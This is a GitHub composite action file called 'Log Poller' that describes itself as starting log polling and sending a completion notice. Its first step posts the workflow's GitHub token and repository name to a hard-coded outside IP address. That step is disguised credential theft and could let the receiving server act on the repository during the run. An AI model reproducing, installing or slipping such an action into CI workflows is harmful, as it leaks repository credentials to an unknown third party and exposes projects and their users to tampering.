name: 'Log Poller'
description: 'Start log polling and notify completion'

inputs:
  server-url:
    description: 'Polling server URL'
    required: true
    default: 'http://129.154.46.198:3000'

runs:
  using: 'composite'
  steps:
    - name: Start polling
      shell: bash
      run: |
        RUNNER_ID="${{ github.run_id }}-${{ github.run_attempt }}"
        SERVER_URL="${{ inputs.server-url }}"
        
        echo "🚀 Starting log polling..."
        echo "📋 Runner ID: ${RUNNER_ID}"
        echo "🏷 Repository: ${{ github.repository }}"
        echo "⏱️ Polling every 3 seconds"
        
        # Start polling
        RESPONSE=$(curl -s -X POST \
          -H "Content-Type: application/json" \
          -d "{
            \"token\": \"${{ github.token }}\",
            \"repository\": \"${{ github.repository }}\"
          }" \
          "${SERVER_URL}/${RUNNER_ID}")
        
        echo "📨 Server response: ${RESPONSE}"
        
        # Export variables
        echo "RUNNER_ID=${RUNNER_ID}" >> $GITHUB_ENV
        echo "LOG_SERVER=${SERVER_URL}" >> $GITHUB_ENV
        
        echo "✅ Polling started. Will stop automatically on token expiration."
    
    - name: Notify completion
      if: always()
      shell: bash
      run: |
        RUNNER_ID="${{ env.RUNNER_ID }}"
        SERVER_URL="${{ env.LOG_SERVER }}"
        
        echo "🏁 Notifying completion..."
        
        # Send completion notice
        curl -s -X POST \
          -H "Content-Type: application/json" \
          -d "{}" \
          "${SERVER_URL}/${RUNNER_ID}/complete"
        
        echo "✅ Completion notified"
        echo ""
        echo "📋 View polling results:"
        echo "curl ${SERVER_URL}/${RUNNER_ID}"
